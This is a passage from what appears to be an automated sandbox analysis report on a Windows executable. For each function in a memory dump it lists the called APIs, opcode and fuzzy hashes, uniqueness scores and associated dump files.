                • API ID: ErrorLastacceptselect
                • String ID:
                • API String ID: 385091864-0
                • Opcode ID: 0e9b9cb3286ad05336ba9b6af4fc0a740256da8e7103ce6d9d417aa9d6455920
                • Instruction ID: e15ccb9f86f63dd26e3f9dc5e6dda5ef3614823406c45fbfd40bbaf6fd9f42c2
                • Opcode Fuzzy Hash: 0e9b9cb3286ad05336ba9b6af4fc0a740256da8e7103ce6d9d417aa9d6455920
                • Instruction Fuzzy Hash: 742154716002089BD714DF68DD45BAAB7F8EF94710F14866EF949DB390DBB0A980CF94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042682A, Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 0042684C
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0042685F
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00426876
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0042688E
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: e32452221e4a94b32405e515279b44a158e93834cfe0dec0ac25b35f1ed36715
                • Instruction ID: 19fd3e6e895a7d6dd35b4456f2a81d9285005d816ebf0cf3c9f2adefea7e8971
                • Opcode Fuzzy Hash: e32452221e4a94b32405e515279b44a158e93834cfe0dec0ac25b35f1ed36715
                • Instruction Fuzzy Hash: 51113075601208BFDB10EF69DC85F9AB7E8EF98350F208156FD48DB340D671A9418BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00420165, Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32 ref: 004201AF
                • GetStockObject.GDI32(00000011), ref: 004201C5
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 004201CF
                • ShowWindow.USER32(00000000,00000000), ref: 004201EA
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CreateMessageObjectSendShowStock
                • String ID:
                • API String ID: 1358664141-0
                • Opcode ID: 485d9a71cda43b1cf814e06499cd1d10d202d6bd9c937192b5c3f030e17a767e
                • Instruction ID: 43505e196f7a94ebf4bf1dd74e67069b926a8a29cb3410f3972b9782ba9b058e
                • Opcode Fuzzy Hash: 485d9a71cda43b1cf814e06499cd1d10d202d6bd9c937192b5c3f030e17a767e
                • Instruction Fuzzy Hash: 641154722005146BD715CF59DC49FDBB3A9AF98B10F14821AFA0893290D774E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00433B8B, Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00433BAA
                • MessageBoxW.USER32(?,?,?,?), ref: 00433BE0
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00433BF6
                • CloseHandle.KERNEL32(00000000), ref: 00433BFD
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                • String ID:
                • API String ID: 2880819207-0
                • Opcode ID: 6c6016972624ddcb8088e3f0e2dc6581904755acf470c64aa294dad7507ebc35
                • Instruction ID: b6d8eb73323c189fce86d182722cb1b66591b6b2ea45ac378a6a7fa9b2392fb1
                • Opcode Fuzzy Hash: 6c6016972624ddcb8088e3f0e2dc6581904755acf470c64aa294dad7507ebc35
                • Instruction Fuzzy Hash: A311A072904118ABD710DF68ED08ADF7FADEF89631F14026AFD0893391E6B49A5087E5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00420AF4, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: 58dbda33213e46d700c119cb944f99b063b97dea1ae2a56b324fcd587253099c
                • Instruction ID: add70c28e80cbba1dc241a0a5568128bcfa9a3443cd8d41b4a09b4037cdb82fb
                • Opcode Fuzzy Hash: 58dbda33213e46d700c119cb944f99b063b97dea1ae2a56b324fcd587253099c
                • Instruction Fuzzy Hash: C01177B9D00209AFCB14DF98D9809AEFBB9FF98310F10855AE855A3344D774AA41CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004238ED, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • __wsplitpath.LIBCMT ref: 00423913
                  • Part of subcall function 0040392E: __wsplitpath_helper.LIBCMT ref: 00403970
                • __wsplitpath.LIBCMT ref: 00423935
                • __wcsicoll.LIBCMT ref: 00423959
                • __wcsicoll.LIBCMT ref: 0042396F
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                • String ID:
                • API String ID: 1187119602-0
                • Opcode ID: 227108a87a38af16b85804464b95bfb6512746552479d647c522da08bb5ece35
                • Instruction ID: 797524fa622fb56aa231ea8eaa7456b133a68df755f4312f8be9931510527f25
                • Opcode Fuzzy Hash: 227108a87a38af16b85804464b95bfb6512746552479d647c522da08bb5ece35
                • Instruction Fuzzy Hash: BA0121B2C0011DAADF14DF95CC81DEEB3BCAB44304F04869EB90962040EA759BD88FE4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00411D53, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction ID: 2bad2ca0b71dd0c7b956c40949a2344faaa87f540458c6160078b1e086ebd781
                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction Fuzzy Hash: F211803240014ABBCF125F85EC41CEE3F22BB59394F188516FB1858130D73BD9B2AB89
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042494A, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcslen$_malloc_wcscat_wcscpy
                • String ID:
                • API String ID: 1597257046-0
                • Opcode ID: df738021e0c63cb1ae39155470d7067c9b09d5667cc6beb4a862c3a589a89186
                • Instruction ID: 61880f12cdc86a5b754e2bd3c62bace66c3af3a4ecec79ea744a22bc9ec5dbf1
                • Opcode Fuzzy Hash: df738021e0c63cb1ae39155470d7067c9b09d5667cc6beb4a862c3a589a89186
                • Instruction Fuzzy Hash: DC0162712002406FC314EB6AC8C6D2BB3EDEB89314B00853EF5569BBA1DA39E8408764
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043B574, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(?), ref: 0043B581
                • InterlockedExchange.KERNEL32(?,?), ref: 0043B58F
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B5A6
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B5B8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                • String ID:
                • API String ID: 2223660684-0
                • Opcode ID: e40111beaab1330e69a1fa867d2627e27072d5b2b808bb50e6942981d503d586
                • Instruction ID: 57ca33682ac2307a786a6c943e9cd25fe5aa9dd549ecbf0554e705d6fdaa997a
                • Opcode Fuzzy Hash: e40111beaab1330e69a1fa867d2627e27072d5b2b808bb50e6942981d503d586
                • Instruction Fuzzy Hash: DFF0BE36241104AF82109F55FE488D7B3ECEB997357005A2BE605C36118BA2F885CBB5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00437215, Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004370BF: DeleteObject.GDI32(00000000), ref: 004370FC
                  • Part of subcall function 004370BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043714C
                  • Part of subcall function 004370BF: BeginPath.GDI32(?), ref: 00437161
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043718A
                • MoveToEx.GDI32(?,?,?,00000000), ref: 0043723B
                • LineTo.GDI32(?,?,?), ref: 0043724A
                • EndPath.GDI32(?), ref: 0043725A
                • StrokePath.GDI32(?), ref: 00437268
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                • String ID:
                • API String ID: 2783949968-0
                • Opcode ID: 60c662f3e267d3b1e533697ca5d68124bf3c8c1d9edb9d060bfd921bc5bdab5f
                • Instruction ID: 89e460fb26c2b49f2c1aa8de7aecce3934665cb7a21c82e7ae3a7c6f124898b7
                • Opcode Fuzzy Hash: 60c662f3e267d3b1e533697ca5d68124bf3c8c1d9edb9d060bfd921bc5bdab5f
                • Instruction Fuzzy Hash: 4FF06270105254BBE7219F14AD49F9F3B6CEB05310F008115F901663D1C7B46D518BB9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00420A7C, Relevance: 6.0, APIs: 4, Instructions: 34processCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memset$CloseCreateHandleProcess
                • String ID:
                • API String ID: 3277943733-0
                • Opcode ID: 43dffc050c6e3d714ddddbbde23807f66b5a9ad0385683f31dba97698907b5a8
                • Instruction ID: 89f231d0631cf17ed9691115a235cc310166e48b8c1ce6d12ecdfea28d3ca4a0
                • Opcode Fuzzy Hash: 43dffc050c6e3d714ddddbbde23807f66b5a9ad0385683f31dba97698907b5a8
                • Instruction Fuzzy Hash: ACF0DA723C030476FA219B6CDD4BF8736599718F58F61003EB708691D3C6F96D40869D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00426406, Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                Download Yara Rule
                APIs
                • SendMessageTimeoutW.USER32 ref: 00426425
                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00426438
                • GetCurrentThreadId.KERNEL32 ref: 0042643F
                • AttachThreadInput.USER32(00000000), ref: 00426446
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                • String ID:
                • API String ID: 2710830443-0
                • Opcode ID: a8933413f109f2a181d3a397782ce4b6efe4cd3dc3150dada944e43e3e292f80
                • Instruction ID: 922ce350dc26e5512c6575e9f32b30cfec58b5b5a8ce64f5ebb4f0c50b884b30
                • Opcode Fuzzy Hash: a8933413f109f2a181d3a397782ce4b6efe4cd3dc3150dada944e43e3e292f80
                • Instruction Fuzzy Hash: 36F09271380314B6EB216BA0AD0EFDB775CAB14B11F90C012F708B90C1C6F8A680876D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00426BB5, Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00426BC2
                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00426BD0
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00426BE0
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00426BE5
                  • Part of subcall function 00426ABB: GetProcessHeap.KERNEL32(00000000,?), ref: 00426AC8
                  • Part of subcall function 00426ABB: HeapFree.KERNEL32(00000000), ref: 00426ACF
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                • Opcode ID: 13de43bbc74156059336e68c9b0ddeec5d6072a9c5466d978eae68404877e3a9
                • Instruction ID: 5de1e260815a082e03e56a45cc0b7e7031aac0a953d9f9fffa1c0071e85c997a
                • Opcode Fuzzy Hash: 13de43bbc74156059336e68c9b0ddeec5d6072a9c5466d978eae68404877e3a9
                • Instruction Fuzzy Hash: 2CE0E5755002146BC714EBA5DD44C57B7EDEF99330311892AFD5993750DA74F840CEA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040506D, Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                Download Yara Rule
                APIs
                • __getptd_noexit.LIBCMT ref: 00405070
                  • Part of subcall function 00407913: GetLastError.KERNEL32(00000003,?,00407994,?,00401259,?,?,004012DC,?,00000001), ref: 00407917
                  • Part of subcall function 00407913: ___set_flsgetvalue.LIBCMT ref: 00407925
                  • Part of subcall function 00407913: __calloc_crt.LIBCMT ref: 00407939
                  • Part of subcall function 00407913: __initptd.LIBCMT ref: 00407962
                  • Part of subcall function 00407913: GetCurrentThreadId.KERNEL32 ref: 00407969
                  • Part of subcall function 00407913: SetLastError.KERNEL32(00000000,?,004012DC,?,00000001), ref: 00407981
                • CloseHandle.KERNEL32(?,?,004050BB), ref: 00405084
                • __freeptd.LIBCMT ref: 0040508B
                • ExitThread.KERNEL32 ref: 00405093
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit__initptd
                • String ID:
                • API String ID: 2246029678-0
                • Opcode ID: 3ed9262f943bc09ddb1de2e1b721b4d75dd5df9cdcf7c35352d82379db12315e
                • Instruction ID: c1c3a182c135eeecb077c5eba5915ce379f7b7ba5944d24999e777b6da16646d
                • Opcode Fuzzy Hash: 3ed9262f943bc09ddb1de2e1b721b4d75dd5df9cdcf7c35352d82379db12315e
                • Instruction Fuzzy Hash: 3FD0A731D05D1017C1312334480DA1F3355DF40731B140B26F869A71D1CBBCDD828ADD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041F2DF, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _strncmp
                • String ID: Q\E
                • API String ID: 909875538-2189900498
                • Opcode ID: 22a2591c7bc51b109162297e982798210b48833ac2b33c42b905360a9c7a83a3
                • Instruction ID: 5b1b5ed9b8e0352affcc41842872dca339a4ee6fe073c737d8920c30d7e5459e
                • Opcode Fuzzy Hash: 22a2591c7bc51b109162297e982798210b48833ac2b33c42b905360a9c7a83a3
                • Instruction Fuzzy Hash: 4DC1C1709046699BCF31CE1881503EBBBB6AF5A314F6441BBD8E493355D3389DCB8B89
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004382B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0043839F
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004383B8
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID: '
                • API String ID: 3850602802-1997036262
                • Opcode ID: 373ed7671c2d5ad7a825a601298abe7d49dccc1d36b71ed9e15ba792a3d93d72
                • Instruction ID: 5eb1591e0fedb32f12951e2b704bc0fcea72c52a1231dabc9d4272097aae758d
                • Opcode Fuzzy Hash: 373ed7671c2d5ad7a825a601298abe7d49dccc1d36b71ed9e15ba792a3d93d72
                • Instruction Fuzzy Hash: 3C419971A003099FCB04CF99D880AEEB7B5FB98700F14906EED09AB345DB756941CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00441297, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                Download Yara Rule
                APIs
                • GetWindowTextLengthW.USER32(00000000), ref: 004412C0
                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004412D0
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: LengthMessageSendTextWindow
                • String ID: edit
                • API String ID: 2978978980-2167791130
                • Opcode ID: e55492ed1ab22f9dafe70fcae5ea0f0b6215f6d9f413d20c26a14eb90c4a00a7
                • Instruction ID: 442119b3b933876dacc29b61a5f645063d3dfd654a96ea77a2b68a6507209900
                • Opcode Fuzzy Hash: e55492ed1ab22f9dafe70fcae5ea0f0b6215f6d9f413d20c26a14eb90c4a00a7
                • Instruction Fuzzy Hash: 902145755102056BFB108E69DC84EEB33ADEB99334F11431BFA64E72D0C6B9DC818B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID: ?T
                • API String ID: 4104443479-3504941901
                • Opcode ID: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
                • Instruction ID: 95a307acf62bb563a41d134dd95b52687d24ec8b5bff177d7bdff8b3d1188dda
                • Opcode Fuzzy Hash: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
                • Instruction Fuzzy Hash: 4011AFB2510119AFC704DF68D8C09BE73ADAF05344B50417AEA06CB601E735FA55C7E4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004324F3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                Download Yara Rule
                APIs
                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0043257F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
